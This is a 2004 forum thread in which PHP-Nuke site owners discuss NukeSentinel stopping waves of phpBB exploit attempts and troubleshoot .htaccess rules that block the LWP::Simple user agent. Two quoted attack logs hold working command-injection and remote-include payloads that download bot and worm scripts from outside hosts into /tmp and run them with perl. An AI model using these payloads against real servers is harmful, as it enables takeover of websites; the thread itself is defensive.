Ravens PHP Scripts: Forums

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm)
TheosEleos
Life Cycles Becoming CPU Cycles

PostPosted: Fri Dec 24, 2004 9:34 am Reply with quote

[ Only registered users can see links on this board! Get registered or login! ]

And they got owned.

Site Admin/Owner

PostPosted: Fri Dec 24, 2004 9:37 am Reply with quote

Groovy

coldblooded

PostPosted: Fri Dec 24, 2004 12:15 pm Reply with quote

They've been hammering on our forums with a combination on highlight and rush scripts, every couple minutes or so, for the last 12 hours from a variety of IPs. Sentinel is easily one of the most important projects for Nuke to come out. worship

blarneystone
Client

PostPosted: Fri Dec 24, 2004 12:34 pm Reply with quote

371 Attack attempts on my site so far TODAY! Sentinal stopped every one

Thanks for a great utility! Wave

Raven

PostPosted: Fri Dec 24, 2004 2:14 pm Reply with quote

Add this line to your .htaccess in the list of bots that you block at the end, so that
RewriteCond %{HTTP_USER_AGENT} ^Zeus
becomes

RewriteCond %{HTTP_USER_AGENT} ^LWP::Simple [NC,OR]
RewriteRule ^.*$ emailsforyou.php [L]

Now you may have a different RewriteRule.

CurtisH
Life Cycles Becoming CPU Cycles

PostPosted: Fri Dec 24, 2004 3:13 pm Reply with quote

coldblooded wrote:
They've been hammering on our forums with a combination on highlight and rush scripts, every couple minutes or so, for the last 12 hours from a variety of IPs. Sentinel is easily one of the most important projects for Nuke to come out. worship

I have had over 100 of these attempts today, different IP each time. Is this the santy thing or are these individuals?

User ID: Anonymous (1)
Reason: Abuse-Script
--------------------
User Agent: LWP::Simple/5.803
Query String: curtishancock.net/modules.php?name=Forums&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20civa.org/pdf/bot;perl%20bot;wget%20civa.org/pdf/ssh.a;perl%20ssh.a%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527

PostPosted: Fri Dec 24, 2004 3:18 pm Reply with quote

If it's not, it's a carbon copy. It's trying to exploit phpbb so I imagine it is.

montego
Site Admin

PostPosted: Sat Dec 25, 2004 6:11 pm Reply with quote

Raven,
I am new to modifying .htaccess. Sentinel is adding the deny's at the end of the file. Do we place the Rewrite commands in front of where Sentinel has started to write the deny statements?

Thanks for the help! Getting concerned with how these guys even found my site. I thought I was careful to keep it out of the search engines. It is strictly a family site. Bummer... wish these guys would put their skills to "good" rather than all this stupid mayhem...

TIA,
montego

PHrEEkie
Subject Matter Expert

PostPosted: Sat Dec 25, 2004 7:27 pm Reply with quote

Put it at the top, then a space between it and where Sentinal has started adding IP's. Make sure to have the blank space at the end of the Sentinal bans so that it can continue adding them.

PHrEEk

PostPosted: Sat Dec 25, 2004 8:36 pm Reply with quote

Well, the following is NOT stopping the abuse attempts. I am still getting the emails from Sentinel still. Not sure what is wrong. Is there another setting that I may have to turn on in the .htaccess file to get it to work?

Here is what I currently have in my .htaccess file:

Code:

RewriteEngine on
#The next lines check for Spammers Robots and redirect them to a fake page
RewriteCond %{HTTP_USER_AGENT} ^LWP [NC,OR]
RewriteRule ^.*$ScriptViolation.php [L]
RewriteEngine Off

The user agent is showing up as User Agent: LWP::Simple in my Sentinel emails. Does this sound like Apache isn't doing what I am trying to tell it to do?

TIA,
montego

Raven

PostPosted: Sat Dec 25, 2004 8:56 pm Reply with quote

Try changing [NC,OR] to [NC, OR]

PHrEEkie

PostPosted: Sat Dec 25, 2004 8:59 pm Reply with quote

Apache needs to have mod_rewrite enabled, but that's fairly standard stuff.. can't imagine a host having that disabled, but then again, nothing really surprises me anymore... lol

PHrEEk

Raven

PostPosted: Sat Dec 25, 2004 9:05 pm Reply with quote

Great point. I just take that for granted

montego

PostPosted: Sun Dec 26, 2004 8:01 am Reply with quote

Does apache have to be restarted after I change the .htaccess file? I just verified that my Hosting company just upgraded to 4.3.10 PHP (just this morning!) and it does have mod_rewrite module as a loaded module. Does this mean it should be enabled?

Also, strangly enough, after I updated my .htaccess file last night, Sentinel stopped writing IP addresses to it. The "kiddies" are still getting banned but I am losing server-level protection... I don't like that idea. Hence my question about restarting Apache OR if I need to do something in Sentinel to get it to log again?

You guys are great!
montego

Raven

PostPosted: Sun Dec 26, 2004 8:25 am Reply with quote

No on restarting Apache. NukeSentinel never sees these now because they are blocked at the server level.

montego

PostPosted: Sun Dec 26, 2004 8:29 am Reply with quote

Raven, but I am still getting emails from Sentinel on these exact same abuses... as mentioned in my post. How can this be?

Raven

PostPosted: Sun Dec 26, 2004 8:33 am Reply with quote

Since, for some yet unknown reason, the .htaccess code is not working on your site, NukeSentinel is still protecting you Smile. Do you have the .htaccess code at the very top of your .htaccess?

montego

PostPosted: Sun Dec 26, 2004 8:38 am Reply with quote

I will PM you with my .htaccess code up to where the IP addresses were getting added. Sorry for being such a pest. It is just so unnerving to have someone going after me and my family!

Raven

PostPosted: Sun Dec 26, 2004 8:42 am Reply with quote

Hopefully the changes you mentioned will work!

montego

PostPosted: Sun Dec 26, 2004 9:03 am Reply with quote

Uuuuggghhhhh.... they just tried again! I just don't understand why .htaccess is not working as expected. Here is the attack email text:

Code:

Date & Time: 2004-12-26 07:00:22
Blocked IP: 69.44.153.*
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: LWP::Simple/5.65
Query String:
mysite.com/modules.php?name=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt
Forwarded For: none
Client IP: none
Remote Address: 69.44.153.20
Remote Port: 37526
Request Method: GET

Any thoughts? I just cannot see why the .htaccess commands are not working. I am going to have to submit a ticket to my web host!

UUUgggghhhhh

montego

PostPosted: Sun Dec 26, 2004 9:54 am Reply with quote

Contacted my web hosting company. They made it sound like they had to make a chg to the conf file to enable rewrite! They have done so now, so we'll now see if this blasted code finally works for me. Bang Head

Sure appreciate everyone's help on this. Such a pain. Hopefully all the work on this recently will help improve many of our skills in addressing these issues ourselves in the future. I have certainly learned a thing of two.

If you do not hear back from me, Raven, then you'll know it is working. So far so good...

montego

Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm)

View next topic
View previous topic